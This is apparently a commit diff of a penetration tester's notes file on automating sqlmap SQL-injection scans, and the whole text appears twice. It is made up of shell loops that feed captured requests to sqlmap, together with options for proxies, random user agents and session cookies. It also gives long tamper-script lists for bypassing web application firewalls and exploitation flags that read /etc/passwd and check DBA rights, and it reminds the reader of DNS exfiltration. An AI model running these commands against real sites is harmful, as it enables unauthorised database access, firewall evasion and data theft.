hoodoer · September 20, 2024 15:09
diff --git a/SleuthQL Loop Tricks.txt b/SleuthQL Loop Tricks.txt
 sleuthql.py -d domainname -f proxyHistory.xml

 for i in ./*.txt; do sqlmap -r $i --batch; done

 Forcing https/ssl:
 --force-ssl

 Random user agent:
 --random-agent

 Proxy:
 --proxy="socks5://127.0.0.1:8082"


 With counter: 
 COUNTER=1; for i in `ls *.txt`; do echo $COUNTER"/"`ls -1 | wc -l`; COUNTER=$((COUNTER+1)); sqlmap -r $i --batch --threads 5; done;

 With counter and proxy:
 COUNTER=1; for i in `ls *.txt`; do echo $COUNTER"/"`ls -1 | wc -l`; COUNTER=$((COUNTER+1)); sqlmap -r $i  --proxy="http://localhost:8080" --batch --threads 5; done;


 for i in `ls *.txt`; do sqlmap -r $i --proxy="http://localhost:8080" --batch --cookie="JSESSIONID=XYZBBQSAUCE" --cookie="CASessionId=ANOTHERCOOKIE" --random-agent --force-ssl --threads 5; done


 Force database backend type if you know it:
 --dbms mssql


 Tamper scripts
 sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1’ --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

 Fewer scripts, good general:
 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes


 https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423


 Exploitation:
 -current-user --is-dba --hostname

 --file-read=/etc/passwd

 Don't forget DNS exfil
	sleuthql.py -d domainname -f proxyHistory.xml

	for i in ./*.txt; do sqlmap -r $i --batch; done

	Forcing https/ssl:
	--force-ssl

	Random user agent:
	--random-agent

	Proxy:
	--proxy="socks5://127.0.0.1:8082"


	With counter:
	COUNTER=1; for i in `ls *.txt`; do echo $COUNTER"/"`ls -1 \| wc -l`; COUNTER=$((COUNTER+1)); sqlmap -r $i --batch --threads 5; done;

	With counter and proxy:
	COUNTER=1; for i in `ls *.txt`; do echo $COUNTER"/"`ls -1 \| wc -l`; COUNTER=$((COUNTER+1)); sqlmap -r $i --proxy="http://localhost:8080" --batch --threads 5; done;


	for i in `ls *.txt`; do sqlmap -r $i --proxy="http://localhost:8080" --batch --cookie="JSESSIONID=XYZBBQSAUCE" --cookie="CASessionId=ANOTHERCOOKIE" --random-agent --force-ssl --threads 5; done


	Force database backend type if you know it:
	--dbms mssql


	Tamper scripts
	sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1’ --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

	Fewer scripts, good general:
	tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes


	https://forum.bugcrowd.com/t/sqlmap-tamper-scripts-sql-injection-and-waf-bypass/423


	Exploitation:
	-current-user --is-dba --hostname

	--file-read=/etc/passwd

	Don't forget DNS exfil